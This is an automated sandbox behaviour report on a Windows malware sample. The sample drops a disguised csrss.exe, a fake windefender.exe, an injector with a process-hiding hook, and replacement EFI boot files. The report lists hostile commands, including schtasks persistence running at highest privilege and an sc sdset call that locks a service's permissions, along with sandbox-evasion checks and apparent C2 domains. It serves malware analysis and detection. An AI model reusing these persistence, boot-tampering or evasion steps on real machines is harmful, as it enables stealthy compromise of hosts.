            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000026.00000002.427962622.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: f6oNLRKHUy.exe, Static PE information: section name: UPX2
            Source: csrss.exe.3.dr, Static PE information: section name: UPX2
            Source: windefender.exe.8.dr, Static PE information: section name: UPX2
            Source: injector.exe.8.dr, Static PE information: section name: _RDATA
            Source: bootx64.efi.8.dr, Static PE information: section name: .xdata
            Source: NtQuerySystemInformationHook.dll.8.dr, Static PE information: section name: _RDATA
            Source: EfiGuardDxe.efi.8.dr, Static PE information: section name: .xdata
            Source: bootmgfw.efi.8.dr, Static PE information: section name: .xdata
            Source: windefender.exe.8.dr, Static PE information: real checksum: 0x0 should be: 0x20ae45
            Source: NtQuerySystemInformationHook.dll.8.dr, Static PE information: real checksum: 0x0 should be: 0x2279d
            Source: bootmgfw.efi.8.dr, Static PE information: real checksum: 0x2199 should be: 0x4c78
            Source: bootx64.efi.8.dr, Static PE information: real checksum: 0x2199 should be: 0x4c78
            Source: f6oNLRKHUy.exe, Static PE information: real checksum: 0x0 should be: 0x3a37d7
            Source: csrss.exe.3.dr, Static PE information: real checksum: 0x0 should be: 0x3a37d7
            Source: EfiGuardDxe.efi.8.dr, Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
            Source: injector.exe.8.dr, Static PE information: real checksum: 0x0 should be: 0x54ea2
            Source: initial sample, Static PE information: section name: UPX0
            Source: initial sample, Static PE information: section name: UPX1

            Persistence and Installation Behavior:

            Creates files in the system32 config directory
            Source: C:\Windows\System32\netsh.exe, File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe, Executable created and started: C:\Windows\rss\csrss.exe
            Source: unknown, Executable created and started: C:\Windows\windefender.exe
            Drops PE files with benign system names
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe, File created: C:\Windows\rss\csrss.exe
            Source: C:\Windows\rss\csrss.exe, File created: C:\EFI\Boot\bootx64.efi
            Source: C:\Windows\rss\csrss.exe, File created: C:\EFI\Boot\EfiGuardDxe.efi
            Source: C:\Windows\rss\csrss.exe, File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
            Source: C:\Windows\rss\csrss.exe, File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            Source: C:\Windows\rss\csrss.exe, File created: B:\EFI\Boot\old.efi (copy)
            Source: C:\Windows\rss\csrss.exe, File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
            Source: C:\Windows\rss\csrss.exe, File created: C:\Windows\windefender.exe
            Source: C:\Windows\rss\csrss.exe, File created: B:\EFI\Microsoft\Boot\fw.efi (copy)

            Boot Survival:

            Creates an autostart registry key pointing to binary in C:\Windows
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FragrantButterfly
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Windows\rss\csrss.exe, Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

            Hooking and other Techniques for Hiding and Protection:

            May modify the system service descriptor table (often done to hook functions)Show sources
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\windefender.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\windefender.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmp Binary or memory string: VMUSRVC.EXE
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 600 Thread sleep time: -82000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 6948 Thread sleep time: -210000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 1756 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)
            Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi
            Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi
            Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi
            Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)
            Source: C:\Windows\rss\csrss.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe File opened / queried: VBoxGuest
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe File opened / queried: vmci
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe File opened / queried: HGFS
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe File opened / queried: VBoxTrayIPC
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe File opened / queried: \pipe\VBoxTrayIPC
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe File opened / queried: VBoxMiniRdrDN
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A00B5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,34_2_00007FF6A00B5C10
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmp Binary or memory string: vmusrvc.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmp Binary or memory string: qemuvirtual
            Source: f6oNLRKHUy.exe, 00000003.00000002.372398606.00000000118FE000.00000004.00000001.sdmpBinary or memory string: xennet6xensvcxenvdb
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: GPU1ZSPWGFTCloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: systemvboxtray.exe
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
            Source: csrss.exeBinary or memory string: epslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DY
            Source: csrss.exeBinary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
            Source: csrss.exeBinary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: main.isRunningInsideVMWare
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vmmousevmusb$
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vboxservice.exe
            Source: csrss.exeBinary or memory string: uetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vboxtray.exe
            Source: csrss.exeBinary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is 
emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
            Source: f6oNLRKHUy.exe, 00000003.00000002.372262046.00000000118DA000.00000004.00000001.sdmpBinary or memory string: ?advapi32.dllRegQueryValueExWFragrantButterflyFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTime1ZSPWGFTOpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exef6oNLRKHUy.exeTrustedInstaller.exetrustedinstaller.exef6oNLRKHUy.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System 
